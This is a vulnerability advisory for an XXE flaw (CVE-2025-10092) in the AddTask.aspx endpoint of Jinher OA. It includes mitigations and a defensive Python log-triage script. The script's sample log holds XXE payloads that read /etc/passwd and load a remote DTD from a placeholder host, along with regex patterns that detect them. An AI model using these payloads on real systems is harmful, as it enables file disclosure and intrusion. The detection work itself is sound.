CVE Alert: CVE-2025-10092 – Jinher – OA

CVE-2025-10092

Severity: HIGH. No exploitation known. PoC observed.

A vulnerability was found in Jinher OA up to version 1.2. It affects an unknown function in the file /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add of the XML Handler component. Manipulation of the request leads to an XML external entity (XXE) reference. The attack can be launched remotely. The exploit has been publicly disclosed and may be used.

CVSS v3.1 score: 7.3
Vendor: Jinher
Product: OA
Versions: 1.0 | 1.1 | 1.2
CWE: CWE-611, XML External Entity Reference
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R
Published: 2025-09-08T11:32:06.165Z
Updated: 2025-09-08T13:33:31.403Z

AI Summary Analysis

Risk verdict

High risk: remote, unauthenticated exploitation is possible with a publicly available PoC, enabling potential data exposure or manipulation.

Why this matters

The vulnerability affects a web-facing XML handler, enabling external entity processing. This can lead to disclosure of local/internal data or server-side impact without user interaction, impacting confidentiality and potentially availability.

Most likely attack path

An attacker needs no credentials and can trigger the flaw over the network by sending crafted XML to the web endpoint. The XML parser resolves external entities, risking data exfiltration or local file access. The CVSS vector rates the impact on integrity and availability as low, but the combination of remote reachability and a public PoC makes the endpoint a likely target for automated scanning and rapid exploitation.

Who is most exposed

Enterprise deployments of Jinher OA with web interfaces (XML Handler) on internal networks or internet-facing gateways are at risk, particularly where network segmentation is weak and admin controls are lax.

Detection ideas

  • Unusual outbound connections to local or internal hosts, or unexpected file reads, triggered by XML payloads.
  • Logs showing errors or exceptions referencing external entities during AddTask.aspx requests.
  • Anomalous XML payloads targeting /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add.
  • Indicators from CTI signatures or PoC references in application logs.
  • Increased authentication failures or remote probing activity targeting the OA web interface.

Mitigation and prioritisation

  • Apply the latest vendor patch or upgrade to a fixed build; verify patch availability for all affected versions.
  • Disable or restrict external entity processing in the XML parser where feasible; harden XML handling configuration.
  • Implement network controls: restrict OA web access, add WAF rules to block XXE patterns, and monitor for suspicious XML requests.
  • Enable strict input validation and XML schema enforcement; review file access permissions.
  • Change-management: test fixes in staging before production; consider interim compensating controls if patch delays occur. If KEV is confirmed or EPSS ≥ 0.5, treat as priority 1.
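The detection ideas above (flagging DTD and external-entity markers in XML sent to the AddTask.aspx endpoint) and the mitigation bullet on disabling external entity processing can both be exercised with the following added example. It is not Jinher's code and not part of the advisory; it assumes a reverse proxy or WAF that writes one JSON object per request including the request body (an assumed log format), and the sample log lines are constructed. The DOCTYPE gate in parse_xml_safely is the parser-independent form of the "prohibit DTD processing" control; in the .NET stack the OA product runs on, the equivalent is setting XmlReaderSettings.DtdProcessing to DtdProcessing.Prohibit and XmlResolver to null.

```python
"""CWE-611 (XXE) request triage and a DTD-rejecting parse gate.

Added example, not the vendor's code. Assumed inputs: JSON-per-request
log lines carrying the request body; untrusted XML arriving at a service.
"""
import json
import re
import xml.etree.ElementTree as ET

# Endpoint named in the advisory.
TARGET_PATH = "/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx"

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY % name PUBLIC "id" "uri">.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:(?P<system>SYSTEM)\s+\"(?P<uri>[^\"]*)\"|"
    r"(?P<public>PUBLIC)\s+\"[^\"]*\"\s+\"(?P<puri>[^\"]*)\")",
    re.IGNORECASE,
)


def inspect_xml_body(body: str) -> list[str]:
    """Return reasons this XML body is suspicious; an empty list means clean.

    'dtd-present' for any DOCTYPE, 'external-entity:<uri>' for each
    SYSTEM/PUBLIC entity, 'parameter-entity' when a '%' entity is declared
    (the form used to pull in a remote DTD).
    """
    reasons: list[str] = []
    if DOCTYPE_RE.search(body):
        reasons.append("dtd-present")
    for m in ENTITY_RE.finditer(body):
        uri = m.group("uri") if m.group("system") else m.group("puri")
        reasons.append(f"external-entity:{uri}")
        if m.group("param"):
            reasons.append("parameter-entity")
    return reasons


def parse_xml_safely(body: str) -> ET.Element:
    """Refuse any DTD before the document reaches a parser, then parse."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DTD/DOCTYPE not allowed in request XML")
    return ET.fromstring(body)


def triage_log(lines: list[str]) -> list[dict]:
    """Alert on XML bodies carrying DTD/entity markers; severity is highest
    when an external entity is declared in a request to the advisory's path."""
    alerts = []
    for raw in lines:
        rec = json.loads(raw)
        reasons = inspect_xml_body(rec.get("body", ""))
        if not reasons:
            continue
        on_target = rec.get("path", "").startswith(TARGET_PATH)
        external = any(r.startswith("external-entity:") for r in reasons)
        severity = "high" if (on_target and external) else ("medium" if external else "low")
        alerts.append({"ts": rec["ts"], "src": rec["src"], "path": rec["path"],
                       "severity": severity, "reasons": reasons})
    return alerts


# Constructed sample log lines (not real traffic; RFC 5737 addresses).
SAMPLE_LOG = [
    json.dumps({"ts": "2025-09-08T12:00:01Z", "src": "203.0.113.10", "method": "POST",
                "path": TARGET_PATH + "/?Type=add",
                "body": '<?xml version="1.0"?><!DOCTYPE t [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
                        '<task><name>&x;</name></task>'}),
    json.dumps({"ts": "2025-09-08T12:00:02Z", "src": "198.51.100.7", "method": "POST",
                "path": TARGET_PATH + "/?Type=add",
                "body": '<task><name>Quarterly report</name><owner>alice</owner></task>'}),
    json.dumps({"ts": "2025-09-08T12:00:03Z", "src": "203.0.113.10", "method": "POST",
                "path": "/c6/other.aspx",
                "body": '<?xml version="1.0"?><!DOCTYPE t [<!ENTITY % r SYSTEM "http://dtd.example.net/x.dtd"> %r;]><t/>'}),
    json.dumps({"ts": "2025-09-08T12:00:04Z", "src": "198.51.100.8", "method": "POST",
                "path": TARGET_PATH + "/?Type=add",
                "body": '<!DOCTYPE task [<!ELEMENT task ANY>]><task>internal dtd only</task>'}),
]

if __name__ == "__main__":
    for a in triage_log(SAMPLE_LOG):
        print(a["severity"], a["src"], a["path"], a["reasons"])
    try:
        parse_xml_safely(json.loads(SAMPLE_LOG[0])["body"])
    except ValueError as e:
        print("rejected:", e)
    print(parse_xml_safely(json.loads(SAMPLE_LOG[1])["body"]).find("owner").text)
```

The triage deliberately keeps a plain internal DTD (fourth sample line) as a low-severity alert rather than ignoring it: legitimate clients of this endpoint have no reason to send a DOCTYPE at all, so any DTD is worth logging, while an external entity declaration on the advisory's path is what should page someone.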
